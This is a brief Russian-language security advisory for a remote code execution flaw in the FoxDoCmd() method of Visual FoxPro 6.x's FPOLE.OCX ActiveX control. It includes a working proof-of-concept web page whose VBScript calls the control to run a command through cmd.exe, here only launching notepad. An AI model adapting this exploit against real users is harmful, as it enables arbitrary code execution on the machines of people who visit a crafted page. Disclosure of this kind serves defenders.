Программа: Microsoft Visual FoxPro 6.x
Уязвимость позволяет удаленному злоумышленнику выполнить произвольный код на
целевой системе. Уязвимость существует из-за ошибки в
проверке входных данных в FPOLE.OCX ActiveX компоненте в методе "FoxDoCmd(). Атакующий может заманить пользователя на специально составленный сайт,
что приведет к выполнению произвольного кода.
Пример:
<object classid='clsid:EF28418F-FFB2-11D0-861A-00A0C903A97F' id='test'></object>
<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>
<script language='vbscript'>
Sub tryMe
test.FoxDoCmd "RUN cmd.exe /c notepad.exe", "Something"
End Sub
</script>
